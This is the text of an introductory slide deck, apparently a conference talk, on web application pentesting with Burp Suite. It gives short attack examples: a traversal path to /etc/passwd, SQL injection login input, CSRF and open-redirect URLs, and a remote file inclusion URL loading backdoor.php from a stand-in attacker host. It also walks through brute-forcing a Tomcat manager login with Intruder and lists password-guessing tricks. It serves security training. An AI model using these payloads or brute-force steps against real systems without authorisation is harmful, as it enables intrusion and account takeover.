web hacking with burp suite 101

Introduction to Web App Pentesting & Burp Suite 101

Build | Protect | Learn

Agenda

• $whoami• Overview of Web App Testing &

Vulnerabilities• Burp Suite Overview• Getting Started With Burp Suite• Automated Testing• Manual Testing• Other Features in Burp• Manual Testing Mindset & Example• Additional Web Hack Tips N Tricks• Useful Resources & Conclusion

~$ whoami

• InfoSec Geek • Pentester @ BreakPoint Labs (0xcc_labs)• Contributor to Primal Security Blog and Podcast• @b3armunch (Personal Infosec Twitter)• Certification Enthusiast (OSCP,GWAPT, GPEN,

etc.)• I Love Knowing What’s Going On (emerging vulns,

tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.

Full Disclosure!

• ALWAYS test what your about to learn in a lab environment or when you have permission!

• What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite

Build | Protect | Learn 5

I Promise NOOOOO…

Overview

• Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment.

• Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment.

- Burp Provides manual and automated testing capabilities.- Burp has a free and paid for version. (currently $349 per year)

• Quick Note: Static vs. Dynamic Web ContentStatic Content: Informational web content that tends to lack user features and capabilities.

Dynamic Content: Content that allows for user input to be passed to the server.

Web App Testing Methodologies

• Having an established testing methodology is an important first step.

• Create Checklists and templates to reassure the assessments process.

• Several great methodologies out there:Pentesting Execution Standard (PTES)OWASP Testing Guide (OTG) 4.0Web Application Hackers Handbook Task Checklist

• Any great methodology will include both Automated and Manual testing.

Common Web Vulnerabilities

• Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that executed client side (in the user’s web browser).

• Directory Traversal: Used by an attacker to gain unauthorized access to restricted directories and resources on the web server.

index.php?q=../../../../../etc/password

• Cross-Site Request Forgery: An attack that forces an end user to execute unwanted actions on a web application that the end user is currently authenticated too.

http://testbank.com/transfer.php?acct=BadBob&amount=500

• Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a user to the manipulated parameter value without any input validation.

index.php?redirect=https://badboysite.com

Common Web Vulnerabilities

• SQL Injection: A form of code injection used against data driven applications with malicious SQL statements being inserted into a data entry field or parameter value for execution.

username: admin’– (Attempts to log you in as the admin user, with the rest of the SQL Query being ignored.)

• Brute Force Attacks: A trial and error method used to obtain authentication to a web application. (username, password, pin, etc.)

• Remote File Inclusion (RFI): The ability to include links to remote files through the exploitation of a vulnerable inclusion procedures implemented on the app.

http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php

• Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly sanitized and an adversary can request a file located on the server through a web browser.

Web App Testing Procedure

1) Scoping: Laying the land through a questionnaire or conference call. (Always document though)

2) Recon & Mapping: What’s the size and technologies of the applications? (Spidering, Mapping and OSINT)

3) Automated Testing: Scan All The Things! (Utilizing Automated Scanners and open source testing tools too)

4) Manual Testing: Enumerate potential areas of interest and validated any automated tool findings (Abuse features, test injection points and reduce false positives)

5) Reporting: Essentially putting all your hard work into one document.

6) Remediation & Review: Provide support and re-testing of findings once remediated

Burp Suite Overview

Often Burp will be leveraged for its interception proxy capabilities.

• Proxy: Intercept, Capture and Log Requests• Spider: Discover Linked Content• Scanner: Active Web App Vulnerability Scanner• Intruder: Automate your testing through injection points • Repeater: Take a request and manipulate it to analyze the response further• Sequencer: Analyze Tokens (Are they randomly generated?)• Encoder/Decoder: Take encode or decode strings (URL, Base64, HTML)• Comparer: Take two things and compare them side by side• Extender: TONS of extensions to expand the features in Burp

• So Enough Talk….Let’s Actually Learn How to Use Burp!

Let’s Begin

Launching Burp• Burp Suite is a java jar file that can either be double clicked

or run from the CLI. The following syntax can launch burp:

java –jar –Xmx1024m burpsuite.jar

Burps Proxy• Burps proxy is an intercepting proxy server that

operates as a man-in-the-middle between your browser and the target web application.

Setting Up Your Browser

Burps Proxy Settings

Common Issue….

Define Your Scope

Map Your App (Click through)• Understand the apps purpose

• What Features are allowed?

• Can you sign in?

• View the Source

• Observe the file and directory structure

• What technologies are in use? (Wappalyzer)

• Is information being displayed that I can control?

• Does the app appear to interact with a database?

Spider (Linked Content)

Building Your Site MapThe Site Map Tree View contains a hierarchical representation of content, with URLs broken down into domains, directories, files, and parameterized requests.

Spider (Linked Content)

Filter Content In Your Site Map

Filtering Can Lead to…• Client side comments (Easter eggs the developer left behind!)

• Email Addresses (Potential leveraged for logins)

• Internal Path Disclosure

• Unlinked Files or Paths

• Potentially usernames and passwords (not very likely)

• Technology Enumeration

Analyze Your Target

Target Analyzer SummaryStatic Content: Essentially content that could be considered “flat files”, meaning what you see is what you get!

Often times static content is used to present end users news or information

Dynamic Content: Allows for user interaction and communicates with “back end” or “server-side” requests from the application.

Think of a search engine or login form.

HTTP History & Comments

Automated Testing

Automated Testing Will Miss Stuff

• The DHS National NCATS organization reported that 67% of high impact vulnerabilities required manual testing to enumerate.

Automated Testing Can Break Stuff

Automated Testing Can Take a Long Time

Automated Testing Can Have False Positives

• Burp: Right-Click -> [Send to Repeater] [Request in Browser]

Burps Automated Scan Wizard

Burps Automated Scan Queue

Burps Automated Scan Results

Generate a Burp Scan Report

Burp Automated Scan Report• Burp Scanner Report will include: Finding Issue Details, Severity,

Confidence, Request, Response, etc...

Automated Testing

Manual Testing

Some Things To Think About • What technology is in use?• Ensure that you properly mapped the application• Enumerate all technology features (File upload, Comments, etc.)• Enumerate all areas of user input "Injection Points"• Can you figure what is being done with your input?• Is your input being presented on the screen? -> XSS• Is your input calling on stored data? -> SQLi• Does input generate an action to an external service? -> SSRF• Does your input call on a local or remote file? -> File Inclusion• Does your input end up on the file system? -> File Upload

• Think OWASP Top TEN….

OWASP Top Ten Snap Shot

Source: https://www.owasp.org/index.php/Top_10_2013-Top_10

Analyze Scan Results > Repeater (1)

Test, Modify & Repeat

Analyze Scan Results > Repeater (2)

Verify Results (XSS Example - False Positive)

Verify Results (XSS Example -Successful)

Think About How Input Is Being Used

Think about how to attack the following parameters and their values?

http://example-site.com/index.php?redirect=/contact/contact-us.php

http://example-site.com/index.php?file=/app/load.php

http://example-site.com/index.php?name=zack

http://example-site.com/index.php?search=exploitdb

http://example-site.com/index.php?sql=SELECT * FROM USERS

Burps Intruder

Custom Fuzzing

• FuzzDB, Raft Lists, and SecLists provide great lists for customer fuzzing.• As you start to understand how your input is being leveraged you can

start your fuzzing in an automated manner. • Burp Suite Pro’s Intruder is my go to tool for web application fuzzing.

Unlinked Content Treasures!• Use Burps Pre-Built Payload Lists for Fuzzing (Intruder Pro Version Only)

• Use Commonly known lists from tools like Dirbuster or Wfuzz (We can enable Burp to add any new findings to our site map!)

• Use the “SecLists” collection and it’s lists broken down by the following:- Passwords - Usernames- Discovery (Collection of general and specified directories/ resources) - Fuzzing (Collection of various payloads sorted by attack type)- Miscellaneous (Common Ports, Files extensions, list of US cities,

etc.)- Pattern Matching (Good for the grep utility through file contents)- IOCs (Indicators of compromise [ Malicious domains, IPs, files, etc.)- New Feature: RobotsDisallowed (Disallowed directories from the robots.txt files of the world's top websites--specifically the Alexa 100K.)

^ Source: https://github.com/danielmiessler/SecLists

Define Your Intruder Method

• Sniper – Sends a single set of payloads to a selected parameter(s) value to identify vulnerabilities.

• Battering Ram – Sends a single payload to all payloads marked at once. It iterates through the payloads, and places the same payload into all of the defined payload positions at once.

• Pitchfork – Sends a specific payload to each of the selected parameters in sequence. Each area of interest is passed its own designated values in a sequenced series of requests.

• Cluster Bomb – All payloads are tested with all the variables given meaning that all permutations of payload combinations are tested. (WARNING this is the largest and longest attack method often)

Burps Intruder Set Your Position

Define the Intruder Payload List

Intruders Results (Status | Length)Note: You May Want to Uncheck Payload Encoding If not Needed!!!!

Burp Pro’s Discover Content (Unlinked)

Burps Discover Content Options

Burps Discover Content Session Status

Other Features in Burp…

Burps Encoder/Decoder

Burps Comparer

Key: Modified | Deleted | Added

Burps Sequencer

Burps Extender

Manual Testing Mindset & Example• Now let’s cover a basic example of how we can

compromise a web application through several features that we can abuse!

Weak Authentication Mechanism • Very common finding with web application penetration testing• Often combines several vulnerabilities:

- Username enumeration (Low) +- Lack of Automation Controls (Low) +- Lack of Password Complexity Requirements (Low) =- Account Compromise (Critical)

Weak Authentication: Username Enumeration

• Password Reset Features “Email address not found”• Login Error Messages “Invalid Username”• Timing for login Attempts: Valid = 0.4 secs Invalid = 15 secs• User Registration “Username already exists”• Various error messages, and HTML source• Contact Us Features “Which Admin do you want to contact?”• Google Hacking and OSINT• Document Metadata• Sometimes the application tells you!

Weak Authentication: Automation Controls

• Pull the authentication request up in Burp’s Repeater and try it a few times.

• If you see no sign of automation controls send to Burp’s Intruder for more aggressive testing.

- No account lockout- No/Weak CAPTCHA- Main login is strong, but other resources are not

(Mobile Interface, API, etc.)

Weak Authentication: Weak Passwords

• We as humans are bad at passwords…here are some tricks that work for me:

- Password the same as username- Variations of “password”: “p@ssw0rd”…- Month+Year, Season+Year: summer2016…- Company Name + year- Keyboard Walks – PW Generator: “!QAZ2wsx”- My Favorites…Burp Pros Built in Wordlist or SecList

Password Files

• Lots of wordlists out there, consider making a targeted wordlist using CeWL (scrape sites for unique keywords).

• Research the targeted user’s interests and build lists around those interests.

Piecing Together What We Know…

• We have enumerated that theirs a valid account named “tomcat” from the password reset functionality in the forms based login (Also a default account for Apache Tomcat).

• The application also has basic authentication protecting its “ tomcat manager” login on port 8080 (No lockout built in and will need to base64 encode payloads).

• We know theirs a lack of password complexity, since we made a test account with a password of “password”. (create account feature abuse)

• Let’s leverage Burp’s Intruder to brute force…

Manipulating Our Target Request

1. View our HTTP History Under the Proxy Tab.2. Find our HTTP Request for the Tomcat

‘/manager/html’ login resource.3. Send our request to Burps Intruder.

Burp Intruder Payload Configuration

4. Add the § Payload Markers § around the Basic Authorization Value with the Sniper Attack.

Analyze Your Encoded Payload

To provider further context let’s decode our sample login attempt to the tomcat login > Send to Burps Decoder > Base64 Decode and we can see our attempt in plaintext.

(i.e.) tomcat:password

Burp Intruder Payload Set Up

5. Custom Iterator and Position 1 Set 6. Set Position 1 Separator “:”

7. Set Position 2 Password List

Payload Processing Base64 Encode

8. Add a Payload Processing Rule > Encode > Base-64 Encode Your Payload > Properly submits our Brute Force Attempts!!!

Start Intruder & Review Results

9. Look for a variance in your HTTP Status or Length of Response From Your Payload Attempts.

ACHIEVEMENT UNLOCKED!!!!

Additional Web Hack Tips N Tricks

Reconnaissance: Identify New Systems and Content

• Companies are normally quite surprised about what is exposed to the Internet.

• How do you tackle large /8’s, /16’s, how do you even build out this footprint starting with a company name?

- Shodan + Censys.io (3rd Party DBs with Port/Service Info)- Domain + IP Research (Host, Dig, Whois, etc)- Masscan + Nmap (Identify open ports and services)- Whatweb + Wappalayzer (ID Tech Stack)- Google, Bing, etc. (Search Syntax)- OSINT: Company Mergers + Acquisitions (Expand Scope?)

Big Scope? Quick Visual: Eye Witness

• EyeWitness is a tool that takes in URLs and creates a report with server headers + Screen shot of the web GUI

• Extremely useful when facing a large scope

Don’t Judge a System By It’s IP• Requesting an application URL by IP might give back different content vs.

the domain.

• Load Balancing could exist to where an application could be mirrored across several IP addresses (Commonly seen with large sites i.e. banks).

• Keep in mind you can have several applications living on the same IP (Virtual Hosting).

• Pointing an automated tool to “http://ip/” may miss a lot of stuff vs. “http://ip/AppIsHere/”.

Shot in The Dark “Nikto” Scan• Open Source web application vulnerability scanner that checks for low

hanging fruit vulnerabilities and some old goodies. (False Positives will happen!)

Version Specific Vulnerabilities• Enumerating the technology and version in use go a long way with

finding vulnerabilities (Google + Exploit-db)

• What do I know about the technology and how can I find more information?

Build Your Own Custom Report• We leverage Markdown for Custom Reporting to give our reports

in a HTML format. Common Findings Database - Check it out

Useful Resources

• CTFs: Vulnhub, Past CTF Writeups, Pentester Lab• Training: GWAPT , Offensive Security• Book: Web Application Hackers Handbook• Talk: How to Shot Web - Jason Haddix• Talk: How to be an InfoSec Geek - Primal Security• Talk: File in the hole! - Soroush Dalili• Talk: Polyglot Payloads in Practice - Marcus Niemietz• Talk: Running Away From Security - Micah Hoffman• Github Resource: Security Lists For Fun & Profit

• BPL Blog Post on this Talk:

Conclusion

Email: zmeyers@breakpoint-labs.com

• Burp Suite is a great baseline tool to leverage in all your future web assessments.

• OWASP has a large abundance of information to reference and learn from.

• Read blogs and twitter whenever possible, often times dozens of web vulnerabilities and potential exploits are released every day.

web hacking with burp suite 101

Technology

lab 5: web attacks using burp suite · now enter google.com...

inf5290-2018-l06-web hacking 2.ppt - uio.no...in5290 2018...

burp suite extension writing workshop - devils lab extension...

black hat python python hackers and pentesters ·...

連貓也會輕鬆安裝burp suite

automation of web application scanning with burp …...why...

searchsecurity.in burp suite tutorial part 01

burp suite

burp suite introduction - rootcon 12/trainings... · burp...

cusomizing burp suite - getting the most out of burp...

hackerpraktikum - rub nov 2017 · @agarri_fr me hacking...

open jssec-mobile securecoding · • burp suite –...

optimiser ses attaques web avec burp suite -...

nest kali linux tutorial: burp...

burp suite pro real-life tips & tricks - agarri · burp...

cloud platform 2.21 api release notes - qualys · with our...

hacking wireless manual pada windows menggunakan suite

appsec usa 2014 denver, colorado customizing burp suite...

advanced xxe exploitation exercise 2: external dtd...

optimiser ses attaques web avec burp suite ·...